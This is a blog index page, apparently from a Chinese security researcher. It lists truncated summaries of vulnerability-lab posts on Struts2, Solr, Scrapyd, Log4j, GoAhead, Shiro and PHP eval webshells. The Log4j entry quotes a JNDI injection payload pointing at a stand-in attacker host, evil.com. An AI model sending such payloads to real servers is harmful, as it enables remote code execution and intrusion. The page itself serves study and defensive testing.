摘要: eval()函数和system()函数的比较 eval类型函数是代码执行而不是命令执行(一句话木马) system类型函数是命令执行而不是代码执行 eval函数里必须是一个符合php语法的语句,如果语句结尾没有分号会报错:eval()'d code <?php eval("echo 1+1;"); 阅读全文
posted @ 2022-05-16 07:51 NoCirc1e 阅读(470) 评论(0) 推荐(0) 编辑
摘要: 影响版本: 2.0.0 - 2.3.15 漏洞详情: http://struts.apache.org/docs/s2-016.htmlhttp://www.freebuf.com/articles/web/25337.html 测试环境搭建 docker-compose build docker- 阅读全文
posted @ 2022-05-16 07:50 NoCirc1e 阅读(373) 评论(0) 推荐(0) 编辑
摘要: 影响版本: 2.1.0 - 2.3.1 漏洞详情: http://struts.apache.org/docs/s2-008.html 测试环境搭建 docker-compose build docker-compose up -d 原理 参考:http://rickgray.me/2016/05/ 阅读全文
posted @ 2022-05-16 07:50 NoCirc1e 阅读(130) 评论(0) 推荐(0) 编辑
摘要: 漏洞原理与分析可以参考: https://www.exploit-db.com/exploits/43009/https://paper.seebug.org/425/ Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Luce 阅读全文
posted @ 2022-05-16 07:49 NoCirc1e 阅读(247) 评论(0) 推荐(0) 编辑
摘要: 影响版本: 2.0.0 - 2.3.32 漏洞详情: http://struts.apache.org/docs/s2-048.htmlhttp://bobao.360.cn/learning/detail/4078.htmlhttp://xxlegend.com/2017/07/08/S2-048 阅读全文
posted @ 2022-05-16 07:49 NoCirc1e 阅读(37) 评论(0) 推荐(0) 编辑
摘要: scrapyd是爬虫框架scrapy提供的云服务,用户可以部署自己的scrapy包到云服务,默认监听在6800端口。如果攻击者能访问该端口,将可以部署恶意代码到服务器,进而获取服务器权限。 参考链接:https://www.leavesongs.com/PENETRATION/attack-scra 阅读全文
posted @ 2022-05-16 07:48 NoCirc1e 阅读(222) 评论(0) 推荐(0) 编辑
摘要: Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。 参考链接 阅读全文
posted @ 2022-05-16 07:47 NoCirc1e 阅读(421) 评论(0) 推荐(0) 编辑
摘要: GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序。 这个漏洞是CVE-2017-17562漏洞补丁的绕过,攻击者可以利用该补丁没有考虑到的multipart表单控 阅读全文
posted @ 2022-05-16 07:47 NoCirc1e 阅读(432) 评论(0) 推荐(0) 编辑
摘要: Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户 阅读全文
posted @ 2022-05-16 07:46 NoCirc1e 阅读(334) 评论(0) 推荐(0) 编辑
摘要: 下载地址:https://github.com/chaitin/xray/releases 使用环境:Windows、Linux、macOS皆可 工具说明:Xray扫描器是一款功能强大的安全评估工具。支持主动、被动多种扫描方式,支持常见Web漏洞的自动化检测,可以灵活定义POC,功能丰富,调用简单, 阅读全文
posted @ 2022-05-16 07:45 NoCirc1e 阅读(957) 评论(0) 推荐(0) 编辑